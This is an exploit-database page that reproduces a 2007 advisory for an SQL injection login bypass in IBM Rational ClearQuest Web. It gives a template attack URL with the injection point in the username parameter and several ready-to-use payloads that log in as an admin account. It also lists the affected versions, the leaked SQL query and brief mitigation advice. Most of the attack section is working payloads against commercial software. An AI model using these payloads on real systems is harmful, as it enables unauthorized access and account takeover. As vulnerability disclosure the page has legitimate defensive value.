header-logo
Suggest Exploit
vendor:
IBM Rational ClearQuest Web
by:
SecureState (sasquatch - swhite@securestate.com, rel1k - dkennedy@securestate.com)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: IBM Rational ClearQuest Web
Affected Version From: 7.0.0.0-IFIX02
Affected Version To: 7.0.0.1
Patch Exists: NO
Related CWE: Not provided
CPE: a:ibm:rational_clearquest_web:7.0.0.0-IFIX02
Metasploit:
Other Scripts:
Platforms Tested: Not provided
2007

IBM Rational ClearQuest Web Login Bypass (SQL Injection)

The username field on the login page is susceptible to SQL injection. The exploit involves manipulating the 'username' parameter in the login URL to inject SQL code that bypasses the login authentication and grants unauthorized access to the system.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks. Additionally, keeping the software up-to-date with the latest patches and security fixes is advised.
Source

Exploit-DB raw data:

+==============================================================+
+   IBM Rational ClearQuest Web Login Bypass (SQL Injection)   +
+==============================================================+

DISCOVERED BY:
==============
SecureState
  sasquatch - swhite@securestate.com
  rel1k - dkennedy@securestate.com

HOMEPAGE:
=========
www.securestate.com


AFFECTED AREA:
===============
The username field on the login page is where the application is susceptible to SQL injection...


SAMPLE URL:
===========
http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE

Log in as "admin":
==================
' OR login_name LIKE '%admin%'--

(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...

Confirmed against:
==================
version 7.0.0.1        Label BALTIC_PATCH.D0609.929
version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630

FULL SQL Statement is spit back in error message:
=================================================
SELECT
   master_users.master_dbid, master_users.login_name, master_users.encrypted_password,
   master_users.email, master_users.fullname, master_users.phone, master_users.misc_info,
   master_users.is_active, master_users.is_superuser, master_users.is_appbuilder,
   master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask
FROM
   master_users
WHERE
   login_name = 'INJECTION GOES HERE

# milw0rm.com [2007-08-14]

Navigation

Suggest Exploit

Services By CQR